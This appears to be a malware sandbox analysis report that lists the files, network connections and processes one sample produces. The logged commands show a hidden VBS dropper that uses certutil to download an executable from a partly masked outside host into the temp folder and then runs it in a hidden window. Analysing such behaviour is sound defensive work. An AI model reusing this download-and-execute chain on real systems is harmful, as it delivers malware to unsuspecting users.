Technical Information
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tu###xim.com/html/dixtin.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo C...
- %TEMP%\script.vbs
- %TEMP%\bin.exe
- %TEMP%\script.vbs
- 'tu###xim.com':80
- http://tu###xim.com/html/dixtin.exe
- DNS ASK tu###xim.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\script.vbs"
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tu###xim.com/html/dixtin.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo C...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f http://tu###xim.com/html/dixtin.exe %TEMP%\bin.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe' (with hidden window)
- '<SYSTEM32>\timeout.exe' 3
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f http://tu###xim.com/html/dixtin.exe %TEMP%\bin.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://tu###xim.com/html/dixtin.exe %TEMP%\bin.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe